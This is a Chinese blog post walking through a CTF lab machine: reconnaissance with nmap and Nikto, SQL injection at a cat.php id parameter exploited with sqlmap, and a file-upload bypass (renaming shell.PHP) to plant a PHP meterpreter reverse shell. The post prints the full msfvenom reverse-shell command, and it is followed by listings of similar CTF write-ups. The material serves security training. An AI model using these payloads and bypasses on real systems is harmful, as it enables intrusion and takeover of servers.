CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

最新推荐文章于 2024-08-25 20:07:56 发布
最新推荐文章于 2024-08-25 20:07:56 发布
阅读量1.3k 收藏 7
点赞数 3
分类专栏: 信息安全 渗透测试 sql 文章标签: php shell linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43355651/article/details/109191794
版权
信息安全 同时被 3 个专栏收录
10 篇文章 0 订阅
订阅专栏
渗透测试
10 篇文章 0 订阅
订阅专栏
sql
3 篇文章 0 订阅
订阅专栏

靶机地址:
链接:https://pan.baidu.com/s/1MhYXwhaJ8u08-b-6fg4lXg
提取码:8520
 

准备环境:

vm下kali系统和靶机

kali:192.168.111.128

靶机:192.168.111.130

首先进行信息收集这里我们用到端口扫描之王-nmap

namp -sV 192.168.111.130 探测端口服务版本

由此我们得到开放了22和80端口 对应的服务分别是ssh和apache

然后我们再进一步探测 使用Nikto -host http://192.168.111.130 // 探测敏感信息

分析信息可以得到后台目录存在/admin/login  目录下

尝试弱口令登录后无果 继续寻找信息

使用owasp zap 找到存在sql注入

存在sql注入在http://192.168.111.130/cat.php?id=3

然后使用神器sqlmap跑一下 目的得到后台管理员账号和密码

此处不得不感叹sqlmap的强大 同样的注入点比我们手工效率要快很多

得到账号admin  密码:P4ssw0rd

 

然后我们可以登录后台发现可上传文件

是我们拿shell最简单的方式

由此我们可以想到可以使用msf的生成一个php木马文件来反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.111.128 lport=4444 -f raw >shell.php

由此我们在桌面上生成了一个shell.php的文件

然后我们需要用到msfconsole

然后设置好我们需要设置的 LHOST(kali地址)和lport(监听端口之后)

进行反弹shell

然后我们exploit或者run就可以开启监听

然后把我们制作好的shell.php上传 发现不允许上传.php后缀文件

这里我们用最简单的大写绕过 改为shell.PHP

然后我们可以点击shell 如果没出错的话 kali里边是有反弹的

可以看到攻击成功 顺利拿到shell

整个测试很简单 但是 需要我们思路明确能清楚每一步的步骤和目的

此教程仅用于实验测试。

 

Z0安全
关注
专栏目录
CTF之LAMPSecurity CTF4 靶机渗透(SQL注入)
afei001
08-06 960
  练习环境     攻击机:kali     靶机:LAMPSecurity: CTF4     下载地址:https://download.vulnhub.com/lampsecurity/ctf4.zip      1.发现靶机端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.99.177 netmask 255.
SMB服务——CTF靶机
panda.
10-19 381
SMB服务 CTF靶机,有想法的可以私信我(有解析有环境) 首先使用fping工具扫描靶机ip 使用nmap工具扫描端口开放状态 使用smbclient工具扫描 连接进入路径 查看文件 下载文件查看wordpress网站的账户密码 使用get指令下载文件 登录网站 使用msfvenom工具生成木马上传到网站中,利用漏洞连接进入靶机 Shell靶机后台即可
sql注入靶场.zip
06-24
sqli-labs-master,在github下载不了的可以在这下载
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
渗透测试(靶场)CTF4
最新发布
gzy1616的博客
08-25 988
结果进入登录不了,这是由于靶机太老了,ssh的版本有问题。报错提示没有匹配的key exchange方法,靶机的方法是diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1。拿到shell之后常规思路,whoami查看当前账户,uname -a查看操作系统版本,ip a或ifconfig查看ip信息,结果网卡信息都无法看到。拿到了dstevens的shell!接着尝试使用ssh登录。
web靶机系列-GET参数注入
rlenew的博客
05-28 480
主机:192.168.136.133 靶机:192.168.136.143 用nmap、dirb扫描靶机 发现有一个网址http://192.168.136.143/admin登陆进去,发现有登陆页面 试用常规的弱口令进行测试发现都不行,转换思路,看看有没有其他漏洞可入侵 用owasp-zap扫描 发现有sql注入 利用sqlmap -u http://192.168.136.143/cat.php?id=3 –dbs 有两个数据库 再用sqlmap -u http://192.168.136.1
sqli-labs-master.zip sql注入的学习靶机
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载
SQL注入靶机演示)
qq_50646540的博客
09-14 2167
如何安装sqlmap 先安装一个软件,叫sqlmap,用于自动化注入下载之后根据需求放进文件夹内,文件夹最好用英文,方便之后创建快捷方式。 将下载下来的sqlmap移动到Python的文件夹下,再在桌面创建快捷方式,将快捷方式的目标改为cmd,起始位置就是Python文件下的sqlmap。完成后可以先测试一下。 在快捷方式的界面中,输入sqlmap.py -h,有下图中的结果就是装好了。 安装好之后就可以开始使用了。 首先,去找一个有漏洞的网站试手,我这边是学校里的靶机。 先进行一个测试,在网址后面加
CTF练习:SQL注入之get参数注入
qq_43233085的博客
11-24 4097
CTF练习:靶场夺旗环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本拿到靶机shell 靶机地址: 链接:https://pan.baidu.com/s/1NEvQD8b_4BUFMv9-gW4L6w 提取码:tqtv 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172...
CTF练习:SQL注入之X-Forwarded-For报头
qq_43233085的博客
11-28 1012
CTF练习:SQL注入之get参数注入环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本(copy)拿到靶机shell(copy) 靶机地址: 链接: https://pan.baidu.com/s/1u-br8L4Lk4X7EGS7kROhMQ 提取码: 2fmj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172....
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 956
SQL注入getshell靶机实战
CTF-sql注入(get)【简单易懂】
墨鱼菜鸡
09-10 363
目录 环境配置 信息探测 探测敏感信息 尝试弱口令登录 漏洞扫描 web漏洞扫描器owasp-zap 扫描结果 漏洞利用 存在sql注入漏洞 获取数据库 获取数据库下的表名 获取字段值 获取用户名和密码 登录系统 上传shell反弹权限 生成webshell 制作webshell 使用exploit 上传she...
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
sqli-labs-master靶机
10-12
sqli-labs-master。
SQL注入实验靶场(环境)
m0_74025111的博客
11-05 685
​ 扫出了一个库,证明信息就在这个库里面,得知信息在此库里面就好办了,直接爆表和字段信息sqlmap -u http://192.168.171.131/cat.php?​ 是一个登录页面,我们不知道密码,那我们就通过数据库来进行获取信息,在前面的源码中发现存在id参数注入,测试一下该靶场是否存在sql注入。页面没有什么可用的资源,查看源码,从源码可以发现是存在id参数注入,文件上传。进入到上传目录,发现了这个页面存在图片和信息类的,还有相关的路径。通过路径还可以发现有admin目录的,直接访问一手。
DC-8靶机SQL注入,46996.sh提权)
m0_66299232的博客
11-19 360
用nmap探测靶机开放端口和对应服务情况 nmap -p- -A -T4 192.168.166.136。6.把密码写进hash.txt里用john工具破解出一个密码。1.用find命令查询以suid权限执行的文件。1.探测目标靶机ip arp-scan -l。5.开启http服务,将脚本下载靶机。8.写入php代码,反弹shell.虚拟机网络链接模式:桥接模式。2.发现一个exim4可利用。4.下载到当前目录下并查看。6.给执行权限,执行没成功。3.查询相关利用脚本。7.添加参数提权成功。
CTF靶机 Brooklyn Nine Nine 笔记
z4yn:)的博客
08-24 303
Brooklyn Nine Nine 这个房间的目标是初学者水平的黑客,但任何人都可以尝试破解这个盒子。有两种主要的方法用于根目录。 nmap扫描端口 nmap -sV 10.10.235.168 -P- 用nmap对21,22,80端口进行综合扫描 经探测21端口FTP可以匿名登录 nmap -A 10.10.235.168 -p21,22,80 先登录到FTP ftp 10.10.235.168 下载里面note_to_jake.txt 查看这个txt可以列出三个账号:A...
CTF靶机 DC-3
weixin_52221158的博客
09-02 903
CTF靶场 DC-3详细讲解
JIS-CTF 靶机渗透
qq_43235703的博客
02-02 2362
渗透之JIS-CTF靶机 攻击环境 攻击机:kali(10.0.10.223) 靶机:在vmbox上(10.0.10.221) 连接设置:两台均为桥接网卡 探嗅目标 netdiscover -i eth0 _____________________________________________________________________________ IPAt MAC Address...
青少年CTF挑战:SQL注入解题攻略与sqlmap使用
"青少年CTF平台的sql-labs 1-10关的解题方法,包含多种解决方案,包括使用sqlmap和Python脚本,适用于学习sql注入和web安全。" 在sql-labs的前五关中,我们主要涉及到的是SQL注入SQL Injection)的基本技巧和策略...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值